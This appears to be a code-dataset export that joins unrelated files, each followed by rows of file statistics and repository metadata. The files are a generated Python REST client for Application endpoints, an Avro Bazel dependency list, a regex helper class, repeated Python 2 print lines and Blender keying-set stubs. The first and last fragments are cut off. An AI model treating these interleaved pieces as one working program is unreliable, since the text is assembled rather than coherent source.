_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_application_using_delete(self, application_id, **kwargs): # noqa: E501
"""Delete an Application # noqa: E501
Permanently delete an Application. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_application_using_delete(application_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application_id: UUID application_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_application_using_delete_with_http_info(application_id, **kwargs) # noqa: E501
else:
(data) = self.delete_application_using_delete_with_http_info(application_id, **kwargs) # noqa: E501
return data
def delete_application_using_delete_with_http_info(self, application_id, **kwargs): # noqa: E501
"""Delete an Application # noqa: E501
Permanently delete an Application. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_application_using_delete_with_http_info(application_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application_id: UUID application_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_application_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application_id' is set
if ('application_id' not in params or
params['application_id'] is None):
raise ValueError("Missing the required parameter `application_id` when calling `delete_application_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'application_id' in params:
path_params['application_id'] = params['application_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/application/{application_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_application_all_using_get(self, **kwargs): # noqa: E501
"""List all Application # noqa: E501
Get details for all Application. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_application_all_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageApplication
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_application_all_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_application_all_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_application_all_using_get_with_http_info(self, **kwargs): # noqa: E501
"""List all Application # noqa: E501
Get details for all Application. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_application_all_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageApplication
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ascending', 'filter', 'order_by', 'page', 'size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_application_all_using_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/application', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageApplication', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_application_using_get(self, application_id, **kwargs): # noqa: E501
"""Retrieve an Application # noqa: E501
Retrieve the information for an Application. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_application_using_get(application_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application_id: UUID application_id (required)
:return: Application
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_application_using_get_with_http_info(application_id, **kwargs) # noqa: E501
else:
(data) = self.get_application_using_get_with_http_info(application_id, **kwargs) # noqa: E501
return data
def get_application_using_get_with_http_info(self, application_id, **kwargs): # noqa: E501
"""Retrieve an Application # noqa: E501
Retrieve the information for an Application. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_application_using_get_with_http_info(application_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application_id: UUID application_id (required)
:return: Application
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_application_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application_id' is set
if ('application_id' not in params or
params['application_id'] is None):
raise ValueError("Missing the required parameter `application_id` when calling `get_application_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'application_id' in params:
path_params['application_id'] = params['application_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/application/{application_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Application', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_application_using_put(self, application, application_id, **kwargs): # noqa: E501
"""Update an Application # noqa: E501
Update the information for an Application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_application_using_put(application, application_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Application application: application (required)
:param str application_id: UUID application_id (required)
:return: Application
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_application_using_put_with_http_info(application, application_id, **kwargs) # noqa: E501
else:
(data) = self.update_application_using_put_with_http_info(application, application_id, **kwargs) # noqa: E501
return data
def update_application_using_put_with_http_info(self, application, application_id, **kwargs): # noqa: E501
"""Update an Application # noqa: E501
Update the information for an Application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_application_using_put_with_http_info(application, application_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Application application: application (required)
:param str application_id: UUID application_id (required)
:return: Application
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application', 'application_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_application_using_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application' is set
if ('application' not in params or
params['application'] is None):
raise ValueError("Missing the required parameter `application` when calling `update_application_using_put`") # noqa: E501
# verify the required parameter 'application_id' is set
if ('application_id' not in params or
params['application_id'] is None):
raise ValueError("Missing the required parameter `application_id` when calling `update_application_using_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'application_id' in params:
path_params['application_id'] = params['application_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'application' in params:
body_params = params['application']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/application/{application_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Application', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 39.328996
| 140
| 0.620918
| 2,370
| 21,159
| 5.270042
| 0.069198
| 0.04996
| 0.036509
| 0.028823
| 0.933787
| 0.916333
| 0.907926
| 0.892954
| 0.878943
| 0.873339
| 0
| 0.016547
| 0.291649
| 21,159
| 537
| 141
| 39.402235
| 0.816787
| 0.326008
| 0
| 0.773852
| 1
| 0
| 0.189191
| 0.05412
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038869
| false
| 0
| 0.014134
| 0
| 0.109541
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3c740f4e2412a1107df73c0b3f23abda485ff1b0
| 132
|
bzl
|
Python
|
third_party/avro/defs.bzl
|
melsicon/kafka-sensors
|
db8d23d0bcf1d7511125921d7ddee748957c0ce1
|
[
"Apache-2.0"
] | 8
|
2019-11-21T08:27:08.000Z
|
2021-05-23T06:50:03.000Z
|
third_party/avro/defs.bzl
|
melsicon/kafka-sensors
|
db8d23d0bcf1d7511125921d7ddee748957c0ce1
|
[
"Apache-2.0"
] | 1
|
2021-08-25T05:11:09.000Z
|
2021-08-25T05:11:09.000Z
|
third_party/avro/defs.bzl
|
melsicon/kafka-sensors
|
db8d23d0bcf1d7511125921d7ddee748957c0ce1
|
[
"Apache-2.0"
] | 1
|
2020-02-03T12:55:50.000Z
|
2020-02-03T12:55:50.000Z
|
""" Apache Avro dependencies. """
AVRO_ARTIFACTS = [
"org.apache.avro:avro-tools:1.10.2",
"org.apache.avro:avro:1.10.2",
]
| 18.857143
| 40
| 0.628788
| 20
| 132
| 4.1
| 0.45
| 0.365854
| 0.317073
| 0.414634
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 0.151515
| 132
| 6
| 41
| 22
| 0.660714
| 0.189394
| 0
| 0
| 0
| 0
| 0.606061
| 0.606061
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3c7aa54cc8470b863515f5c44b41eb0bf8d13945
| 580
|
py
|
Python
|
app/helpers/regex_helper/__init__.py
|
sebbesiren/game-api
|
5d4a6629995a908b89155738dd70646af5f76038
|
[
"MIT"
] | null | null | null |
app/helpers/regex_helper/__init__.py
|
sebbesiren/game-api
|
5d4a6629995a908b89155738dd70646af5f76038
|
[
"MIT"
] | null | null | null |
app/helpers/regex_helper/__init__.py
|
sebbesiren/game-api
|
5d4a6629995a908b89155738dd70646af5f76038
|
[
"MIT"
] | null | null | null |
class RegexHelper:
SWEDISH_PRIVATE_PERSON = "^(19|20)[0-9]{2}((0[1-9])|(1[0-2]))(([06][1-9])|([1278][0-9])|([39][0-1]))[0-9]{4}$"
EMAIL_ADDRESS = "[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?$"
MOBILE_PHONE = "^\+(\d+)$"
USERNAME = "^([a-z0-9_-]){3,70}$"
IP_NUMBER = "^(([2]([0-4][0-9]|[5][0-5])|[0-1]?[0-9]?[0-9])[.]){3}(([2]([0-4][0-9]|[5][0-5])|[0-1]?[0-9]?[0-9]))$"
GUID = "^([0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12})$"
| 72.5
| 156
| 0.382759
| 120
| 580
| 1.783333
| 0.283333
| 0.084112
| 0.168224
| 0.163551
| 0.406542
| 0.406542
| 0.406542
| 0.406542
| 0.406542
| 0.406542
| 0
| 0.179104
| 0.075862
| 580
| 7
| 157
| 82.857143
| 0.220149
| 0
| 0
| 0
| 0
| 0.571429
| 0.746552
| 0.696552
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
590218c05a393b9837cfde7626ff0264d6038def
| 287
|
py
|
Python
|
production/keyphrase/try.py
|
ramaganapathy1/AMuDA-Ir-back-end
|
179bf52fd303440fff661c074c7835c4932d5165
|
[
"MIT"
] | 2
|
2017-09-20T07:47:08.000Z
|
2017-09-27T12:26:11.000Z
|
production/keyphrase/preprocess_audio/try.py
|
ramaganapathy1/AMuDA-Ir-back-end
|
179bf52fd303440fff661c074c7835c4932d5165
|
[
"MIT"
] | null | null | null |
production/keyphrase/preprocess_audio/try.py
|
ramaganapathy1/AMuDA-Ir-back-end
|
179bf52fd303440fff661c074c7835c4932d5165
|
[
"MIT"
] | 2
|
2017-09-27T12:26:13.000Z
|
2018-12-11T00:37:53.000Z
|
print "hello dude!!!"
print "hello dude!!!"
print "hello dude!!!"
print "hello dude!!!"
print "hello dude!!!"
print "hello dude!!!"
print "hello dude!!!"
print "hello dude!!!"
print "hello dude!!!"
print "hello dude!!!"
print "hello dude!!!"
print "hello dude!!!"
print "hello dude!!!"
| 19.133333
| 21
| 0.634146
| 39
| 287
| 4.666667
| 0.076923
| 0.714286
| 1
| 1.252747
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.139373
| 287
| 14
| 22
| 20.5
| 0.736842
| 0
| 0
| 1
| 0
| 0
| 0.590909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 12
|
590362c027fbf411378e59bc42cd44cc47fd7157
| 40,936
|
py
|
Python
|
typings/keyingsets_builtins.py
|
Argmaster/PyR3
|
6786bcb6a101fe4bd4cc50fe43767b8178504b15
|
[
"MIT"
] | 2
|
2021-12-12T18:51:52.000Z
|
2022-02-23T09:49:16.000Z
|
src/blender/blender_autocomplete-master/2.92/keyingsets_builtins.py
|
JonasWard/ClayAdventures
|
a716445ac690e4792e70658319aa1d5299f9c9e9
|
[
"MIT"
] | 2
|
2021-11-08T12:09:02.000Z
|
2021-12-12T23:01:12.000Z
|
src/blender/blender_autocomplete-master/2.92/keyingsets_builtins.py
|
JonasWard/ClayAdventures
|
a716445ac690e4792e70658319aa1d5299f9c9e9
|
[
"MIT"
] | null | null | null |
import sys
import typing
import bpy_types
class BUILTIN_KSI_Available(bpy_types.KeyingSetInfo):
bl_idname = None
''' '''
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, _ksi, _context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_BendyBones(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, _ksi, _context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, _ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_DeltaLocation(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, ksi, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, _ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_DeltaRotation(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, ksi, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, _ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_DeltaScale(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, ksi, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, _ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_LocRot(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_LocRotScale(bpy_types.KeyingSetInfo):
bl_idname = None
''' '''
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_LocScale(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_Location(bpy_types.KeyingSetInfo):
bl_idname = None
''' '''
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, _ksi, _context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_RotScale(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_Rotation(bpy_types.KeyingSetInfo):
bl_idname = None
''' '''
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, _ksi, _context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_Scaling(bpy_types.KeyingSetInfo):
bl_idname = None
''' '''
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, _ksi, _context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
